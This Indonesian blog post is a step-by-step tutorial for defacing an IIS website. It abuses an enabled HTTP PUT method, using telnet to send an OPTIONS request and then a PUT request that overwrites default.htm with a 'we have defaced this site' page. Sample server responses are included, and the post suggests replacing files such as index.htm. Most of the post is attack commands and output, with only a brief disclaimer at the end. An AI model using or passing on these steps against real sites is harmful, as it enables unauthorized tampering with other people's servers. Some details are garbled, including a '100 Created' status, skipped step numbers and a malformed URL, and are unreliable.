"Ini Ceritaku, dan Cerita Teman-Temanku"

Powered by Blogger.
Sunday, March 18, 2012

Hack Website

Untuk meng-hack sebuah website menggunakan teknik atau metode Put ada beberapa langkah yang harus dilakukan :

1. Memeriksa perintah/syntak apa saja yang boleh digunakan
Yang harus dilakukan untuk mendapatkan informasi perintah apa saja yang boleh digunakan yang digunakan adalah dengan menjalankan Command Prompt (Dalam kasus ini kita menggunakan Sistem Operasi Windows XP/NT), yaitu dengan me-run file cmd.exe, Dari jendela command prompt yang muncul kita ketikkan perintah

C:\>telnet nama_website 80
sebagai contoh kita ketikkan perintah C:\>telnet www.pram.com 80 kemudian tekan enter kenudian ketikkan pada command prompt perintah sebagai berikut :

OPTIONS * HTTP/1.1
Host:www.pram.com ,lalu tekan enter

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date : Tue, 23 April 2007 15:13:08 GMT
Content-Lenght : 0
Accept-Ranges: bytes
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-controls : private

dari situ kita bisa tahu bahwa perintah-perintah yang boleh digunakan adalah :
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

kemudian enter, maka akan muncul di jendela command prompt sebagai berikut :
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date : Tue, 23 April 2007 15:14:08 GMT
Content-Type : text/html
Content-Lenght : 87

<html> <head> <title> Error </title></head><body> The paramater is incorrect. </body></html>

Connection to host lost.
C:\>

kemudian kita ketikkan pada command prompt :
C:\>telnet www.pram.com 80, lalu tekan enter
connecting to www.pram.com...



2. Membuat File Baru ke Web Server
Ketikkan pada command prompt perintah unruk membuat file baru sebagai berikut :

PUT /default.htm HTTP/1.1
host:www.pram.com
Content-Lenght:110
<body text="#FFFFFF" bgcolor="#OOOOOO"><font size="H3"> Selamat, Web Ini telah Kami deface</p>

lalu tekan enter maka akan muncul pesan di jendela command prompt sebagai berikut :

HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date : Tue, 23 April 2007 15:16:18 GMT

HTTP/1.1 100 Created
Server: Microsoft-IIS/5.0
Date : Tue, 23 April 2007 15:16:18 GMT
Location : http://www.pram.com/default.htm
Content_Lenght: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date : Tue, 23 April 2007 15:16:18 GMT
Content-Type : text/html
Content-Lenght : 87

<html> <head> <title> Error </title></head><body> The paramater is incorrect. </body></html>

Connection to host lost.
C:\>



5. Jalankan file yang sudah anda buat
Untuk mengetahui apakah anda sudah berhasil membuat file baru dalam direktori website yang anda hack anda tinggal mengetikkan pada address :
http://www/pram.com/default.htm

Jika anda berhasil maka akan muncul halaman yang berisikan pesan yang anda buat yaitu : Selamat, Web Ini telah Kami deface,
anda bisa memasukkan atau membuat file baru dengan nama file seperti yang ada pada direktori, misalnya index.htm dll


Catatan :
Mungkin script diatas hanya berlaku pada web yang menggunakan server IIS, dan berbeda dengan web yang menggunakan server linux atau yang lain. dan berbeda pula jika kita menggunakan Sistem operasi yang lain
Penulis tidak menyarankan/menganjurkan meng-hack atau merusak website milik orang lain, jika anda ingin mencobanya penulis menyarankan membangun lab percobaan sendiri atau bisa juga dengan menggunakan virtual computer agar lebih murah

Tags :

Related : Hack Website

0 komentar:

Post a Comment